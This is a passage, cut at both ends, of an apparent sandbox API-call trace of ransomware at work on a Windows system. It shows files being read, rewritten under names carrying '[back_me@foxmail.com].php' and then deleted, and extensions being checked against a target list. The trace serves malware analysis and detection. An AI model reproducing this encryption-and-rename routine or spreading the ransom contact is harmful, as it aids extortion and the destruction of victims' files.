lpNewFilePointer=0x0) returned 1 [0038.004] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.005] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0038.005] GetLastError () returned 0x0 [0038.005] ReadFile (in: hFile=0x1e4, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x692, lpOverlapped=0x0) returned 1 [0038.006] WriteFile (in: hFile=0x1ec, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x6a0, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x6a0, lpOverlapped=0x0) returned 1 [0038.007] ReadFile (in: hFile=0x1e4, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0038.007] WriteFile (in: hFile=0x1ec, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xe0, lpOverlapped=0x0) returned 1 [0038.007] SetEndOfFile (hFile=0x1ec) returned 1 [0038.007] CloseHandle (hObject=0x1ec) returned 1 [0038.008] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.008] SetEndOfFile (hFile=0x1e4) returned 1 [0038.009] CloseHandle (hObject=0x1e4) returned 1 [0038.009] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0038.009] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png")) returned 1 [0038.009] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0038.009] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0038.009] lstrlenW (lpString=".doc") returned 4 [0038.009] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0038.009] lstrlenW (lpString=".docx") returned 5 [0038.009] lstrcmpiW (lpString1=".docx", lpString2="S.PNG") returned -1 [0038.009] lstrlenW (lpString=".pdf") returned 4 [0038.009] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0038.009] lstrlenW (lpString=".xls") returned 4 [0038.009] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0038.009] lstrlenW (lpString=".xlsx") returned 5 [0038.010] lstrcmpiW (lpString1=".xlsx", lpString2="S.PNG") returned -1 [0038.010] lstrlenW (lpString=".ppt") returned 4 [0038.010] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0038.010] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0038.010] lstrlenW (lpString=".zip") returned 4 [0038.010] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0038.010] lstrlenW (lpString=".rar") returned 4 [0038.010] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0038.010] lstrlenW (lpString=".bz2") returned 4 [0038.010] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0038.010] lstrlenW (lpString=".7z") returned 3 [0038.010] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0038.010] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0038.010] lstrlenW (lpString=".dbf") returned 4 [0038.010] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0038.010] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0038.010] lstrlenW (lpString=".1cd") returned 4 [0038.010] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0038.010] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0038.010] lstrlenW (lpString=".jpg") returned 4 [0038.010] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0038.010] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0038.010] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0038.010] lstrlenW (lpString=".doc") returned 4 [0038.010] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0038.010] lstrlenW (lpString=".docx") returned 5 [0038.010] lstrcmpiW (lpString1=".docx", lpString2="S.PNG") returned -1 [0038.010] lstrlenW (lpString=".pdf") returned 4 [0038.010] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0038.010] lstrlenW (lpString=".xls") returned 4 [0038.010] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0038.011] lstrlenW (lpString=".xlsx") returned 5 [0038.011] lstrcmpiW (lpString1=".xlsx", lpString2="S.PNG") returned -1 [0038.011] lstrlenW (lpString=".ppt") returned 4 [0038.011] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0038.011] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0038.011] lstrlenW (lpString=".zip") returned 4 [0038.011] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0038.011] lstrlenW (lpString=".rar") returned 4 [0038.011] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0038.011] lstrlenW (lpString=".bz2") returned 4 [0038.011] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0038.011] lstrlenW (lpString=".7z") returned 3 [0038.011] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0038.011] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0038.011] lstrlenW (lpString=".dbf") returned 4 [0038.011] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0038.011] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0038.011] lstrlenW (lpString=".1cd") returned 4 [0038.011] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0038.011] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0038.011] lstrlenW (lpString=".jpg") returned 4 [0038.011] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0038.011] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0038.011] lstrlenW (lpString="Alphabet.xml") returned 12 [0038.011] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0038.012] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=791686) returned 1 [0038.012] CloseHandle (hObject=0x1e4) returned 1 [0038.012] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml")) returned 0x20 [0038.013] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0038.013] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0038.013] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0038.013] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0038.013] lstrlenW (lpString=".doc") returned 4 [0038.013] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0038.013] lstrlenW (lpString=".docx") returned 5 [0038.013] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0038.013] lstrlenW (lpString=".pdf") returned 4 [0038.013] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0038.013] lstrlenW (lpString=".xls") returned 4 [0038.013] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0038.013] lstrlenW (lpString=".xlsx") returned 5 [0038.013] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0038.013] lstrlenW (lpString=".ppt") returned 4 [0038.013] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0038.013] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0038.013] lstrlenW (lpString=".zip") returned 4 [0038.013] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0038.013] lstrlenW (lpString=".rar") returned 4 [0038.013] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0038.013] lstrlenW (lpString=".bz2") returned 4 [0038.013] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0038.013] lstrlenW (lpString=".7z") returned 3 [0038.013] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0038.013] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0038.013] lstrlenW (lpString=".dbf") returned 4 [0038.013] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0038.014] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0038.014] lstrlenW (lpString=".1cd") returned 4 [0038.014] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0038.014] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0038.014] lstrlenW (lpString=".jpg") returned 4 [0038.014] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0038.014] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0038.014] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0038.014] lstrlenW (lpString=".doc") returned 4 [0038.014] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0038.014] lstrlenW (lpString=".docx") returned 5 [0038.014] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0038.014] lstrlenW (lpString=".pdf") returned 4 [0038.014] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0038.014] lstrlenW (lpString=".xls") returned 4 [0038.014] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0038.014] lstrlenW (lpString=".xlsx") returned 5 [0038.014] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0038.014] lstrlenW (lpString=".ppt") returned 4 [0038.014] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0038.014] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0038.014] lstrlenW (lpString=".zip") returned 4 [0038.014] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0038.014] lstrlenW (lpString=".rar") returned 4 [0038.014] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0038.014] lstrlenW (lpString=".bz2") returned 4 [0038.014] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0038.014] lstrlenW (lpString=".7z") returned 3 [0038.014] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0038.014] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0038.014] lstrlenW (lpString=".dbf") returned 4 [0038.015] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0038.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0038.015] lstrlenW (lpString=".1cd") returned 4 [0038.015] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0038.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0038.015] lstrlenW (lpString=".jpg") returned 4 [0038.015] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0038.015] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0038.015] lstrlenW (lpString="Content.xml") returned 11 [0038.015] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0038.015] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=27045) returned 1 [0038.015] CloseHandle (hObject=0x1e4) returned 1 [0038.015] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml")) returned 0x20 [0038.015] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0038.016] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0038.016] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0038.016] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0038.016] lstrlenW (lpString=".doc") returned 4 [0038.016] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0038.016] lstrlenW (lpString=".docx") returned 5 [0038.016] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0038.016] lstrlenW (lpString=".pdf") returned 4 [0038.016] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0038.016] lstrlenW (lpString=".xls") returned 4 [0038.016] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0038.016] lstrlenW (lpString=".xlsx") returned 5 [0038.016] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0038.016] lstrlenW (lpString=".ppt") returned 4 [0038.016] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0038.016] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0038.016] lstrlenW (lpString=".zip") returned 4 [0038.016] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0038.016] lstrlenW (lpString=".rar") returned 4 [0038.016] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0038.016] lstrlenW (lpString=".bz2") returned 4 [0038.016] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0038.016] lstrlenW (lpString=".7z") returned 3 [0038.016] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0038.016] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0038.016] lstrlenW (lpString=".dbf") returned 4 [0038.016] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0038.016] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0038.016] lstrlenW (lpString=".1cd") returned 4 [0038.016] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0038.017] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0038.017] lstrlenW (lpString=".jpg") returned 4 [0038.017] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0038.017] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0038.017] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0038.017] lstrlenW (lpString=".doc") returned 4 [0038.017] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0038.017] lstrlenW (lpString=".docx") returned 5 [0038.017] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0038.017] lstrlenW (lpString=".pdf") returned 4 [0038.017] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0038.017] lstrlenW (lpString=".xls") returned 4 [0038.017] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0038.017] lstrlenW (lpString=".xlsx") returned 5 [0038.017] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0038.017] lstrlenW (lpString=".ppt") returned 4 [0038.017] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0038.017] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0038.017] lstrlenW (lpString=".zip") returned 4 [0038.017] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0038.017] lstrlenW (lpString=".rar") returned 4 [0038.017] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0038.017] lstrlenW (lpString=".bz2") returned 4 [0038.017] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0038.017] lstrlenW (lpString=".7z") returned 3 [0038.017] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0038.017] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0038.017] lstrlenW (lpString=".dbf") returned 4 [0038.017] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0038.017] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0038.017] lstrlenW (lpString=".1cd") returned 4 [0038.017] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0038.018] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0038.018] lstrlenW (lpString=".jpg") returned 4 [0038.018] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0038.018] lstrcmpiW (lpString1=".avi", lpString2=".php") returned -1 [0038.018] lstrlenW (lpString="boxed-correct.avi") returned 17 [0038.018] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0039.290] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=89600) returned 1 [0039.291] CloseHandle (hObject=0x1e4) returned 1 [0039.291] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi")) returned 0x20 [0039.291] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0039.291] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0039.291] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0039.291] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0039.291] lstrlenW (lpString=".doc") returned 4 [0039.291] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0039.291] lstrlenW (lpString=".docx") returned 5 [0039.291] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0039.291] lstrlenW (lpString=".pdf") returned 4 [0039.291] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0039.291] lstrlenW (lpString=".xls") returned 4 [0039.291] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0039.291] lstrlenW (lpString=".xlsx") returned 5 [0039.291] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0039.291] lstrlenW (lpString=".ppt") returned 4 [0039.291] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0039.291] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0039.291] lstrlenW (lpString=".zip") returned 4 [0039.291] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0039.291] lstrlenW (lpString=".rar") returned 4 [0039.291] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0039.291] lstrlenW (lpString=".bz2") returned 4 [0039.291] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0039.291] lstrlenW (lpString=".7z") returned 3 [0039.291] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0039.292] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0039.292] lstrlenW (lpString=".dbf") returned 4 [0039.292] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0039.292] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0039.292] lstrlenW (lpString=".1cd") returned 4 [0039.292] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0039.292] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0039.292] lstrlenW (lpString=".jpg") returned 4 [0039.292] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0039.292] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0039.292] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0039.292] lstrlenW (lpString=".doc") returned 4 [0039.292] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0039.292] lstrlenW (lpString=".docx") returned 5 [0039.292] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0039.292] lstrlenW (lpString=".pdf") returned 4 [0039.292] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0039.292] lstrlenW (lpString=".xls") returned 4 [0039.292] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0039.292] lstrlenW (lpString=".xlsx") returned 5 [0039.292] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0039.292] lstrlenW (lpString=".ppt") returned 4 [0039.292] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0039.292] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0039.292] lstrlenW (lpString=".zip") returned 4 [0039.292] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0039.292] lstrlenW (lpString=".rar") returned 4 [0039.292] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0039.292] lstrlenW (lpString=".bz2") returned 4 [0039.292] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0039.292] lstrlenW (lpString=".7z") returned 3 [0039.293] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0039.293] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0039.293] lstrlenW (lpString=".dbf") returned 4 [0039.293] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0039.293] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0039.293] lstrlenW (lpString=".1cd") returned 4 [0039.293] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0039.293] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0039.293] lstrlenW (lpString=".jpg") returned 4 [0039.293] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0039.293] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0039.293] lstrlenW (lpString="ipsdan.xml") returned 10 [0039.293] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0039.521] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=2514) returned 1 [0039.521] CloseHandle (hObject=0x1e4) returned 1 [0039.521] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml")) returned 0x20 [0039.521] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0039.521] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0039.522] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml") returned 61 [0039.522] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml") returned 61 [0039.522] lstrlenW (lpString=".doc") returned 4 [0039.522] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0039.522] lstrlenW (lpString=".docx") returned 5 [0039.522] lstrcmpiW (lpString1=".docx", lpString2="n.xml") returned -1 [0039.522] lstrlenW (lpString=".pdf") returned 4 [0039.522] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0039.522] lstrlenW (lpString=".xls") returned 4 [0039.522] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0039.522] lstrlenW (lpString=".xlsx") returned 5 [0039.522] lstrcmpiW (lpString1=".xlsx", lpString2="n.xml") returned -1 [0039.522] lstrlenW (lpString=".ppt") returned 4 [0039.522] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0039.522] 